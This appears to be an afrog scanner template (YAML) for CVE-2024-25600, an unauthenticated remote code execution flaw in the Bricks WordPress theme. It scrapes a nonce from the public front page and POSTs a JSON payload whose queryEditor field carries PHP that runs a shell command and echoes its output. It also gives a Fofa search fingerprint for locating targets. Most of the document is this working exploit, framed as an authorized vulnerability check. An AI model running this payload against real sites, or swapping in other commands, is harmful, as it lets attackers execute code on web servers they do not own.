漏洞描述 (Vulnerability description)
CVE-2024-25600: the Bricks WordPress theme exposes the REST endpoint `/wp-json/bricks/v1/render_element`, which evaluates the PHP source supplied in `element.settings.query.queryEditor`. The only gate is a nonce that the theme embeds in the public front page, so this PoC fetches `/` without any credentials to obtain it, then runs `id` on the web server and relies on the endpoint echoing the exception message (and thus the command output) back in its response. Fofa fingerprint: body="/wp-content/themes/bricks/"
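# afrog PoC for CVE-2024-25600 (Bricks Builder WordPress theme, RCE).
#
# Flow: r0 fetches the front page and scrapes the REST nonce that the theme
# embeds in the page body; r1 POSTs a "container" element whose
# `queryEditor` PHP is evaluated server-side by /wp-json/bricks/v1/render_element.
# The PHP runs `id` and surfaces its output through an exception message,
# and r1 matches that output in the response body.
#
# WARNING: this is an active check that executes a command (`id`) on the
# target — run it only against systems you are authorized to test.
id: CVE-2024-25600

info:
  name: WordPress的Bricks主题存在远程命令执行
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Fofa: body="/wp-content/themes/bricks/"
  reference:
    - https://mp.weixin.qq.com/s/F9qpmIW04cdmbzkY0KdSyg
  tags: wordpress,cve,cve2024,rce
  # Quoted so no YAML parser is tempted to read it as a timestamp.
  created: "2024/02/28"

rules:
  # r0: obtain the REST nonce from the public front page.
  # The whole PoC is gated on `"nonce":` appearing in the body of `/`; a site
  # that does not render Bricks (or that nonce) on its front page fails here
  # and is reported as NOT vulnerable — treat that as a false negative, not
  # as evidence the site is patched.
  r0:
    request:
      method: GET
      path: /
    expression: response.body.bcontains(b'"nonce":')
    output:
      # Non-greedy capture of the first "nonce":"<value>", pair in the body.
      search: '"\"nonce\":\"(?P<nonce>.+?)\",".bsubmatch(response.body)'
      nonce: search["nonce"]

  # r1: unauthenticated render request carrying PHP in `queryEditor`.
  r1:
    request:
      method: POST
      path: /wp-json/bricks/v1/render_element
      headers:
        Content-Type: application/json
      # The body is JSON for the endpoint, not YAML: values such as
      # "hasLoop": "true" and "postId": "1" are intentionally JSON strings,
      # exactly as the original payload sent them.
      # NOTE(review): postId 1 is assumed to exist on the target — TODO confirm
      # whether the endpoint rejects unknown post IDs before reaching the eval.
      body: |
        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }
    # Match the `id` output echoed back in the response.
    # Fix: the previous pattern `[0-9]{1,4}\([a-z0-9]+\)` could not match
    # hyphenated account names (e.g. uid=33(www-data), the default PHP user on
    # Debian/Ubuntu) nor uids/gids with five or more digits, so real hits were
    # reported as not vulnerable. Digits are now unbounded and the name class
    # admits upper case, dot, underscore and hyphen.
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]+\\([a-zA-Z0-9._-]+\\)".bmatches(response.body)

# A target is vulnerable only if the nonce was scraped AND the command output
# came back.
expression: r0() && r1()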